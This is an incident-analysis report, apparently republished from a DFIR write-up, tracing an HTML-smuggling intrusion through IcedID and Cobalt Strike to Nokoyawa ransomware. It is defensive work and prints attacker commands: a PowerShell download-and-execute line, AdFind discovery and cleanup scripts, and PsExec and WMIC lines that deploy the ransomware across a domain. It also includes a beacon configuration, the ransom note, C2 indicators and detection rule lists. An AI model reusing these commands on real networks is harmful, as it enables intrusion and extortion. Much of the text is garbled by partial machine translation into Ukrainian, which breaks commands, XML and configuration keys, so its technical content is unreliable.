New Malicious Method: From HTML to Nokoyawa Ransomware

25 September 2023 21 minutes Author: Cyber Witcher

HTML Smuggling: Distribution of the Nokoyawa Ransomware Virus

Today’s cybersecurity landscape is based on a myriad of demands and threats, leading to constant innovation in the world of cybercrime. Cybercriminals are constantly looking for new and inventive ways to launch attacks and gain unauthorized access to valuable data and resources. In this context, incidents related to the use of HTML macros and ransomware viruses, in particular Nokoyawa, become particularly important. This article analyzes one of the new and dangerous attack methods, which involves the use of HTML macros and ransomware to infiltrate and spread the threat. We will examine this incident without using specific examples, but will focus on the general characteristics and stages of the attack. HTML macros: Enemy entry point. HTML macros, also known as web page macros, were previously used to implement functionality on websites and in electronic documents.

However, over time, cybercriminals have discovered a way to use these macros as a means to create effective attacks. The incident we are looking at started with the electronic delivery of an HTML file that led to the launch of the attack. Analysis revealed that this delivery occurred via email, making this attack method particularly dangerous. HTML Smuggling: A Deception Tool. An HTML file opened by a user caused a fake Adobe page to be displayed and a ZIP archive to download. One of the main aspects of this stage of the attack is the use of a technique known as HTML smuggling. The basic idea is that the user sees a fake page, while behind the scenes malicious content is downloaded. The ZIP archive contained an encrypted password that was designed to protect against automated analysis of malicious content. This was just the first step in a clever plan by cybercriminals. From ZIP to Nokoyawa: The inside scoop. The ZIP archive contained an ISO file. But here is the main trick – it contained a payload of malicious software, but this file was hidden behind a layer of protection. To reveal this layer, attackers used an LNK file that was disguised as a document. And when the user clicked on that LNK file, a sequence of commands was executed that included copying the malicious content from the ISO file to the host before launching the malware. Nokoyawa Ransomware: The Final Act. After downloading the malicious DLL, a connection was made to the IcedID command and control servers, which is another threat in this incident. The user, meanwhile, saw a legitimate image of the financial document, rather than a display of the attack. Attackers also used various tools and commands to detect and deploy their malware. They maneuvered the network and used various methods to attempt to gain unauthorized access and launch attacks.

Summary of the case

In early November 2022, the intrusion began with the delivery of an HTML file. We estimate with high confidence that the delivery was by email, as reported in other public reports. This HTML file used a technique known as HTML smuggling. This is one of the methods that attackers have turned to since Microsoft updated the standard macro control options. Just a month ago, this menace was observed using Excel macros in an extremely similar campaign.

When the user opened the HTML file, a fake Adobe page was displayed and the ZIP file was downloaded. Adobe lure includes a password for the ZIP as a way to protect malicious content from automated analysis. Inside the ZIP was an ISO file. Inside the ISO was a malware payload. The only file visible to the user was the LNK file, which masqueraded as a document.

When the user clicked on the LNK file, a series of commands were executed. This involved copying rundll32 and the malicious DLL from the ISO to the host before running the malware. After downloading the malicious DLL, a connection was established to the IcedID command and control servers. In the meantime, the user received a legitimate image of the financial document.

When the malicious DLL was executed, persistence was also established via a scheduled task on the underlying host. This task was set to run the IcedID malware every hour on the host. The initial discovery commands were run a few seconds after contacting the command and control server.

About three hours after the initial IcedID malware was executed, a cmd process was spawned from IcedID. This new process started sending signals to the Cobalt Strike server. This process was then observed accessing LSASS, presumably to access credentials. A quick check of domain administrators using net was also observed.

Practice then paused for about three hours before the threat actor returned. Using the Cobalt Strike beacon, the attacker searched for specific domain administrators using the net utility. Using one of these accounts, the attacker initiated an RDP session to reach the domain controller. Using this session, the threat actor copied the Cobalt Strike beacon to the domain controller and executed it.

The attacker then continued discovery by executing a batch file on the domain controller that ran the usual battery of Active Directory discovery commands using AdFind. After completion, the results of the discovery commands were archived using 7-Zip. The attacker then ran a second batch file that iterated over the network, performing an nslookup for each host in the environment.

After about five hours, the attacker returned to the domain controller and executed a coded PowerShell command that was SessionGopher. SessionGopher is a tool that finds and decrypts stored session information for remote access tools. The attacker then accessed additional hosts via RDP, including a backup server and a file sharing server. On the backup server, the attacker opened the backup console. While on the shared file, they used notepad to view the file on the host.

The attacker went back to the domain controller and used Netscan to scan the network. After scanning, PsExec and WMIC were used to move files between systems on the network. The copied key files included k.exe and p.bat. These two files were the ransomware binary and the batch script that would be used to execute the ransomware.

Five minutes after the files were transferred to the hosts in the domain, the Nokoyawa ransomware binary was launched on the domain controller. At the same time, PsExec was used to execute a p.bat file that runs the ransomware binary on other hosts in the domain. The time to ransomware (TTR) was just over 12 hours after initial infection.


In this case, we see two different threat actors; distributor and actor holding hands on keyboard. Proofpoint tracks this distributor as TA551. The actor working on the keyboard is tracked by Microsoft as Storm-0390, which is a “pen test” team led by Periwinkle Tempest (previously tracked as Storm-0193 and DEV-0193).

An affiliate ransomware was observed using RDP in an environment with server name WIN-5J00ETD85P5. This server name matches the name used by the threat from the previous Nokoyawa case. Using internet scanning tools we can see that this hostname is currently active at 78.128.113[.]154 hosted on AS209160 Miti2000 at in Bulgaria.

Initial access

This campaign used compromised emails to deliver a malicious HTML file. According to Proofpoint, this campaign was linked to a distribution group they track as TA551. Thanks to Proofpoint for the example below.

After downloading and opening the HTML file, it downloaded a password-protected ZIP file with a random name. The user was provided with a password to extract the file. The following image shows the HTML file opened in the browser.

The ISO file from the zip archive when mounted contained 1 visible LNK file (documents-9771) and 3 hidden files: demurest.cmd, pimpliest_kufic.png and templates544.png.

Once executed, a legitimate image is displayed to trick the user into thinking it’s okay.


The ISO file contained an LNK file with an image icon that prompted the user to click on it. When the user opened the LNK file, the demurest.cmd batch script was executed.

The batch script in demurest.cmd did the following:

  1. Open pimpliest_kufic.png showing the image.

  2. The Windows xcopy utility was used to copy rundll32.exe to %temp%\entails.exe.

  3. Created a string “templates544.png” in the runtime and copied it with a random number in the format: RANDOM_NUM.RANDOM_NUM.

  4. templates544.png was an IcedID DLL and executed via entails.exe.

We can see from memory (MemProcFS) the cmd executes entails.exe which executes the IcedID dll by looking at the command line. We can also see the cmd->entails.exe call chain with the main parent process explorer.exe.

About six hours after the intrusion, 1.dll (Cobalt Strike) was dumped on the beachhead and then copied to the domain controller. After transferring 1.dll to the domain controller, it was executed through rundll32.exe using the following command:

rundll32.exe 1.dll, DllRegisterServer


IcedID registered a scheduled bridgehead stability task that ran every hour.

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="">
  <Реєстраційна інформація>
    <TimeTrigger id="TimeTrigger">
    <LogonTrigger id="LogonTrigger">
    <Принципал id="Автор">
      <RunLevel>Найвищий доступний</RunLevel>
  <Actions Context="Author">
      <Аргументи>"C:\Users\REDACTED\AppData\Local\REDACTED\Izjeubaw64.dll",#1 --oyxo="EdgeDecrease\license.dat"</Arguments>

We can also see similar information in memory when viewing recently created scheduled tasks:

Elevation of privileges

The compromised user had local administrator rights on their computer, which allowed the attacker to use tools that required higher permissions.

Defense evasion

By inspecting the contents of a malicious HTML file, we can detect HTML contraband in the code. First, looking at the <script> tags, we arrive at the following:

If we take this block of data, base64 decode its contents, and export it to a file, we can find the archived ISO file hidden in the document:

The PK header indicates that the data is the beginning of a zip file, and the following data indicates that the content is an ISO file.

The initial vulnerability package used the Windows xcopy utility to rename rundll32.exe to entails.exe. This probably avoids detection logic based on command line execution. Entails.exe, which loaded the IcedID DLL, was then seen entering the cmd.exe process on the underlying host.

Below we can see the IcedID loader in memory in the entails.exe process:

The entail.exe process first opened cmd.exe with GrantedAccess 0x1fffff, which corresponds to PROCESS_ALL_ACCESS, and then called CreateRemoteThread, which was recorded by Sysmon Event ID 10 and 8, respectively, as shown below:

We can also see from memory, beacon.dll was entered in cmd.

Malpedia’s win_cobalt_strike_auto YARA rule was triggered while scanning the memory of the cmd.exe process. The following Cobalt Strike beacon configuration was pulled from process memory:

"BeaconType": "windows-beacon_https-reverse_https",
"Порт": 443,
«Час сну»: 60000,
"Maxgetsize": 1048576,
"Джиттер": 0,
"MaxDns": 0,
«PublicKey»: «30 81 9f 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 81 8d 00 30 81 89 02 81 81 00 a7 38 cd e7 5f 1f bb 1c 18 64 6c 37 7e 03 01 6b 16 2b 12 ba 72 bd f7 dc 36 b4 cd 2e 4e 9b ae 12 20 5a 95 c2 61 70 bf 90 81 05 ad 7f a4 bb cc fa 79 86 32 26 1b ed 98 70 f9 75 f2 07 94 e1 fe 49 95 23 d7 1f 08 a5 6c ae 03 15 bf de 3d 6c 8a 16 38 6b 03 b7 a6 55 1a a1 33 6d 50 32 5a 35 00 db 27 d7 8a d8 fd 13 b6 a7 3b 9f b7 c3 fb 4d 7a 08 8 е 32 3f 07 61 86 56 ec d8 35 95 fa 5f 82 36 13 02 03 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0 0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00",
"c2_server": ",/pixel.gif",
"UserAgent": "Mozilla/4.0 (сумісний; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
"PostURI": "/submit.php",
"Malleable_C2_Instructions2": "",
"HttpGetHeader": "Cookie",
"HttpPostHeader": "\n\u0026Content-Type: application/octet-streamid",
"SpawnTo": "",
"Назва каналу": "",
"KillDateYear": 0,
"KillDateMonth": 0,
"KillDateDay": 0,
"DNSIdle": "",
"DNSSleep": 0,
"SSH_1": "",
"SSH_2": "",
"SSH_3": "",
"SSH_4": "",
"SSH_5": "",
"GetVerb": "ОТРИМАТИ",
"PostVerb": "POST",
"HttpPostChunk": 0,
"SpawnTox86": "%windir%\\syswow64\\rundll32.exe",
"SpawnTox64": "%windir%\\sysnative\\rundll32.exe",
"Криптосхема": 0,
"Проксі": "",
"ProxyUsername": "",
"ProxyPassword": "",
"ProxyType": "Налаштування IE",
"Застарілий": 0,
"LicenseId": 305419776,
"bStageCleanup": 0,
"bCFGCaution": 0,
"KillDate": 0,
"TextSectionEnd": 0,
"ObfuscateSectionsInfo": "",
"ProcessInjectMinAlloc": 0,
"ProcessInjectTransformx86": "",
"ProcessInjectTransformx64": "",
"Використовує файли cookie": 1,
"ProcessInjectExecute": "",
"ProcessInjectAllocationMethod": 0,
"ProcessInjectStub": "b5 4a fe 01 ec 6a 75 ed f3 5e 1a 44 f8 bd 39 29",
"HostHeader": ""

The IP and port correspond to what we see in memory:

The typed cmd.exe, in turn, is inserted into rundll32.exe.

Account access

It appears that Cobalt Strike was used to access the LSASS memory space. Access granted was 0x1010 & 0x1fffff. These values can be used to identify access by credentials.

Pipes were created with the “postex_” prefix of Cobalt Strike by default.

A coded PowerShell command was observed running from the Cobalt Strike beacon on one of the domain controllers.

After decoding, this command showed the execution of the script SessionGopher .

IEX (New-Object Net.Webclient).DownloadString(''); Invoke-SessionGopher


After loading the IcedID DLL through a renamed rundll32, the following discovery commands were observed on the bridgehead host:

cmd.exe /c chcp >&2
ipconfig /все
системна інформація
робоча станція net config
nltest /domain_trusts
nltest /domain_trusts /all_trusts
net view /все /домен
net view /все
net група «Адміністратори домену» /domain

As part of the discovery commands, IcedID used WMI to get a list of antivirus products installed on the underlying host with the following command:

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Шлях AntiVirusProduct Get * /Format:List

The attacker also ran the following detection commands via cmd.exe (introduced Beacon process):

net group "адміністратори домену" /domain
net user Адміністратор/домен
cmd.exe /C каталог *.txt
cmd.exe /C каталог *.dll

AdFind was used for discovery on the domain controller using a batch script called adfind.bat. The script executed the following commands:

adfind.exe -f (objectcategory=person) > ad_users.txt
adfind.exe -f objectcategory=computer > ad_computers.txt
adfind.exe -f (objectcategory=organizationalUnit) > ad_ous.txt
adfind.exe -subnets -f (objectCategory=subnet) > ad_subnets.txt
adfind.exe -f "(objectcategory=group)" > ad_group.txt
adfind.exe -gcb -sc trustdmp > ad_trustdmp.txt
7.exe a -mx3 ad.7z ad_*
del 7.exe adfind* ad_*

After that, the attacker dropped a new ns.bat batch file. This file contained a list of hosts on the network to perform a DNS lookup with nslookup.

C:\Windows\system32\cmd.exe /C ns.bat 
nslookup [ВИДАЛЕНО ХОСТ X] 

Shortly before the ransomware deployment began, the attacker connected to the backup server and opened the backup console on the host. A final discovery was then performed on the domain controller using the SoftPerfect Netscan tool, which was used to perform a final network discovery scan.

Lateral movement

The attacker connected to various hosts on the network through an RDP tunnel through the beacon process on the master host.

We can find the hostname of the threat present in some Windows logs, event IDs 4624, 4776, 4778 and 4779.


Workstation name seen in event 4624 on bridgehead:

Again in event 4776 from the domain controller:

And again 4778 and then 4779 on the domain controller:

During an RDP session, 1.dll (Cobalt Strike DLL) was transferred from the bridge via Windows File Explorer.

Similarly, the final files used to perform the deployment of the ransomware were transferred in the same way, as can be seen in the process logging the creation of the file as Explorer.EXE.

After k.exe and p.bat, as well as various other batch scripts, were transferred to the compromised domain controller, the attacker attempted to copy k.exe to other computers on the network using a copy command executed on the domain controller.

Maybe this command execution didn’t work properly, or as a backup, the threat actor ran the copy command again, but this time instead of running cmd /K copy on the domain controller, they ran wmic to run the copy command from the remote host.

This process was repeated for p.bat, this repetition indicates that it was a script and not a failed copy process.

First, copy the command issued to the domain controller:

Second, copy the command using WMIC so that the remote hosts will run the command.

After k.exe and p.bat were copied to computers on the network, the attacker used PsExec.exe to remotely create a service called mstdc to run p.bat (p.bat runs k.exe, which encrypts the system on based on the configuration in Base64 encoding) through the system account.

A “.key” file is created on each host that hosts PsExec. The filename contains the host name of the machine that initiated PsExec.


After AdFind was finished, the results were archived using 7-Zip.

Command and control

IcedID An outbound connection to trentonkaizerfak[.]com was established after entails.exe (rundll32.exe) successfully executed templates544.png on the underlying host.

This downloaded the gzip file for the next stage of IcedID. After executing this payload, command and control was established for 5.255.103[.]16

Cobalt strike

Once injected into cmd.exe, a 1.dll (Cobalt Strike DLL) was created on the underlying host, which was later pushed to the domain controller. 1.dll was then executed on the domain controller via rundll32.exe, and after running rundll32.exe connected to the command and control server 5.8.18[.]242.


An attacker was observed deploying the Nokoyawa ransomware throughout the environment using both PSExec and WMIC.

psexec.exe \\[ЦІЛЬОВА IP-адреса] -u [ДОМЕН]\[КОРИСТУВАЧ] -p "[ПАРОЛЬ]" -s -d -h -r mstdc -accepteula -nobanner c:\windows\temp\p.bat

wmic /node:"[TARGET IP]" /user:"[DOMAIN]\[USER]" /password:"[PASSWORD]" виклик процесу create "cmd.exe /cc:\windows\temp\p.bat"

This duplication of execution with both PsExec and WMIC displays the duplicate commands used to copy files over the network, pointing to scripted execution for backup.

A batch file (p.bat) is responsible for executing the ransomware binary (k.exe) along with its configurations.

c:\windows\temp\k.exe --config ВИДАЛЕНО

After reviewing the configuration provided in the command options, this ransomware is configured to encrypt the network, load hidden drives, and remove shadow copies of volumes.

Additionally, the configuration informs the ransomware binary to skip the following directories and file extensions.

Виключені каталоги
- Вікна
- Програмні файли
- Програмні файли (x86)
- Дані програми
- ProgramData
- Інформація про системний том

Виключені розширення файлів
- .exe
- .dll
- .ini
- .lnk
- .url
- ""

Redemption notice.


Якщо ви бачите це, ваші файли були успішно зашифровані.
Радимо не шукати безкоштовний метод дешифрування.
Це неможливо. Ми використовуємо симетричне та асиметричне шифрування.

    - Не перейменовуйте зашифровані файли.
    - Не змінюйте зашифровані файли.
    - Не використовуйте стороннє програмне забезпечення.
Для досягнення згоди пропонуємо вам відвідати наш сайт Onion.
Як відкрити посилання Onion:
    - Завантажте браузер TOR з офіційного сайту.
    - Відкрийте та введіть це посилання:
    - На сторінці ви побачите чат зі службою підтримки.
    - Надішліть своє перше повідомлення.
Чим швидше ви зв’яжетеся з нами, тим швидше ви отримаєте рішення.


Diamond model


Кобальтовий удар:

  trentonkaizerfak[.]com на
  questdisar[.]com за адресою
  pikchayola[.]фотографії на














ET HUNTING Підозрілий порожній сертифікат SSL - спостерігається в Cobalt Strike
ET INFO RDP - відповідь на зовнішній хост
ET MALWARE Meterpreter або інший сертифікат зворотної оболонки SSL
ET MALWARE Win32/IcedID Request Cookie
ET ПОЛІТИКА OpenSSL Demo CA - Internet Widgits Pty (O)
Створено службу ET POLICY PsExec
ET ПОЛІТИКА SMB Передача виконуваних файлів
ПОЛІТИКА ET SMB2 NT Створення запиту AndX для файлу .bat
ПОЛІТИКА ET SMB2 NT Створення запиту AndX для файлу DLL - можливий бічний рух
ПОЛІТИКА ET SMB2 NT Створення запиту AndX для виконуваного файлу
ПОЛІТИКА ET SMB2 NT Створення запиту AndX для виконуваного файлу в каталозі Temp
ET RPC DCERPC SVCCTL – доступ диспетчера віддаленого керування службами
ET SCAN Поведінка Незвичайний трафік Порт 135 Потенційне сканування або зараження
ET SCAN Поведінка Незвичайний трафік Порт 445 Потенційне сканування або зараження
ET SCAN Поведінковий Незвичайно швидкий трафік сервера терміналів Потенційне сканування або зараження (вхідний)
ET SCAN Поведінковий Незвичайно швидкий трафік сервера терміналів Потенційне сканування або зараження (вихідний)


DFIR Report Repo:

CHCP CodePage Locale Lookup dfbdd206-6cf2-4db9-93a6-0b7e14d5f02f
AdFind Discovery 50046619-1037-49d7-91aa-54fc92923604

Sigma Repo:

Поганий Opsec за замовчуванням жертвуючі процеси з неправильними аргументами a7c3d773-caef-227e-a7e7-c2f13c622329
Змініть політики PowerShell на незахищений рівень 87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180
CMD Shell Output Redirect 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a
Схема впорскування CobaltStrike BOF 09706624-b7f6-455d-9d02-adee024cee1d
Перший раз побачений віддалений канал з назвою 52d8b0c6-53d6-439a-9e41-52ad442ad9ad
Файл ISO, створений у тимчасових папках 2f9356ae-bf43-41b8-b858-4496d83b2acb
ISO Image Mount 0248a7bc-8a9a-4cd8-a57e-3ae8e073a073
Новий процес, створений через Wmic.EXE 526be59f-a573-4eea-b5f7-f0973207634d
Net.exe Виконання 183e7ea8-ac4b-4c23-9aec-b3dac4e401ac
Неінтерактивний процес PowerShell породив f4bbd493-b796-416e-bbf2-121235348529
Потенційне ухилення від оборони через перейменування дуже релевантних двійкових файлів 0ba1da6d-b6ce-4366-828c-18826c9de23e
Потенційне виконання інструментів Sysinternals 7cccd811-7ae9-4ebe-9afd-cb5c406b824b
Потенційна розвідувальна діяльність через Nltest.EXE 5cc90652-4cbd-4241-aa3b-4b462fa5a248
Створення процесу за допомогою папки Sysnative 3c1b5fb0-c72f-45ba-abd1-4d4c353144ab
Виконання Psexec 730fc21b-eaff-474b-ad23-90fd265d4988
Виконання Rundll32 без файлу DLL c3a99af4-35a9-4668-879e-c09aeb4f2bdf
Спільний доступ і перерахування сеансів за допомогою Net.EXE 62510e69-616b-4078-b371-847da438cc03
SMB Create Remote File Admin Share b210394c-ba12-4f89-9117-44a2464b9511
Підозрілий виклик за порядковим номером e79a9e79-eb72-4e78-a628-0e7e8f59e89c
Підозріле копіювання з або до System32 fff9d2b7-e11c-4a69-93d3-40ef66189767
Підозріло закодований командний рядок PowerShell ca2092a1-c273-4878-9b4b-0d60115bf5ea
Підозріле виконання імені хосту 7be5fb68-f9ef-476d-8b51-0256ebece19e
Розвідка підозрілої групи та облікового запису за допомогою Net.EXE d95de845-b83c-4a9a-8a6a-4fc802ebf6c0
Підозріла маніпуляція обліковими записами за замовчуванням через Net.EXE 5b768e71-86f2-4879-b448-81061cbae951
Підозріла мережева команда a29c1813-ab1f-4dde-b489-330b952e91ae
Підозрілий процес, створений через Wmic.EXE 3c89a1e8-0fba-449e-8f1b-8409d6267ec8
Підозрілий Rundll32 без будь-яких параметрів командного рядка 1775e15e-b61b-4d14-a1a3-80981298085a
Виконання дистанційної команди WMIC 7773b877-5abb-4a3e-b9c9-fd0369b59b00
WmiPrvSE створив процес d21374ff-f574-44a7-9998-4a8c8bf33d7d
Труба під назвою CobaltStrike d5601f8c-b26f-4ab0-9035-69e11a8d4ad2
Підозріле виконання Systeminfo 0ef56343-059e-4cb6-adc1-4c3c967c5e46
Other related articles
Found an error?
If you find an error, take a screenshot and send it to the bot.